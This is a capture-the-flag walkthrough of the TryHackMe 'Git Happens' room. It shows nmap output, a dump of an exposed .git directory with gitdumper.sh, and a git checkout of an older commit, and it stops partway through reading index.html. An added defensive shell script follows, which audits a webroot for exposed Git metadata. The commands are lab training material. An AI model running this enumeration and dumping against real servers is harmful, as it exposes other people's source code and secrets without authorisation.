Git Happens
I think this machine should be rated easy instead of medium, but ok. As the name suggests, we are dealing with git stuff here.
Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy! (TryHackMe | Git Happens)
I start by looking for a web page.
Ok, there will be something to play with while the enumeration is running.
w1zard in try-hack-me/rooms/githappens
sudo nmap -sC -sV -T4 -oN nmap-githappens.txt 10.10.4.93
[sudo] password for w1zard:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 15:06 -03
Nmap scan report for 10.10.4.93
Host is up (0.23s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
| http-git:
| 10.10.4.93:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.11 seconds
nmap was pretty quick and found a git repository.
I found two different tools for dumping git repositories, and I will use GitTools/Dumper. After dumping the contents, I check the log entries.
w1zard in try-hack-me/rooms/githappens
bash /opt/GitTools/Dumper/gitdumper.sh http://10.10.4.93/.git/ ./githappens
w1zard in githappens on master [✘]
git log
After finding the right commit…
commit 395e087334d613d5e423cdf8f7be27196a360459 (HEAD)
...
Reflog message: checkout: moving from master to 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <[email protected]>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
… the checkout and then…
w1zard in githappens on master [✘] took 17s
git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
...
HEAD is now at 395e087 Made the login page, boss!
… checking the files for profit:
w1zard in githappens on v1.0~7 [✘]
ls
css dashboard.html index.html
w1zard in githappens on v1.0~7 [✘]
cat index.html
<!DOCTYPE html>
<html lang="en">
<head>
...
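
A defender-side counterpart to the walkthrough above, added here and not part of the original writeup: a pre-deploy check that flags a .git directory inside a web document root and lists the history entries its reflog would reveal to anyone who can fetch it. The sample tree, SHAs, identity, commit messages and function names are constructed for illustration.

```shell
# Added example: pre-deploy audit for Git metadata inside a web document root.

# Build a constructed document root with a minimal fake .git directory.
# The SHAs, identity and commit messages are made-up sample values.
make_demo_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/site/.git/logs" "$d/clean"
    echo '<h1>demo</h1>' > "$d/site/index.html"
    echo 'ref: refs/heads/master' > "$d/site/.git/HEAD"
    z=0000000000000000000000000000000000000000
    a=1111111111111111111111111111111111111111
    b=2222222222222222222222222222222222222222
    id='Dev <dev@example.test> 1595500000 +0200'
    printf '%s %s %s\tcommit (initial): first prototype\n' "$z" "$a" "$id" > "$d/site/.git/logs/HEAD"
    printf '%s %s %s\tcommit: rework login page\n' "$a" "$b" "$id" >> "$d/site/.git/logs/HEAD"
    echo "$d"
}

# Print the message of every HEAD movement recorded in GITDIR/logs/HEAD.
# Reflog line layout: "<old-sha> <new-sha> <identity> <time> <tz><TAB><message>".
reflog_messages() {
    if [ -f "$1/logs/HEAD" ]; then
        cut -f 2- "$1/logs/HEAD"
    fi
}

# Report every repository under ROOT; return 1 if any was found, else 0.
audit_webroot() {
    list=$(mktemp)
    find "$1" -type f -path '*/.git/HEAD' > "$list"
    rc=0
    while IFS= read -r head_file; do
        gitdir=${head_file%/HEAD}
        rc=1
        echo "EXPOSED ${gitdir#"$1"/} ($(head -n 1 "$head_file"))"
        reflog_messages "$gitdir" | sed 's/^/  history: /'
    done < "$list"
    rm -f "$list"
    return "$rc"
}

# Demo run against the constructed tree.
demo=$(make_demo_webroot)
audit_webroot "$demo" || echo "deploy blocked: .git is inside the document root"
rm -rf "$demo"
```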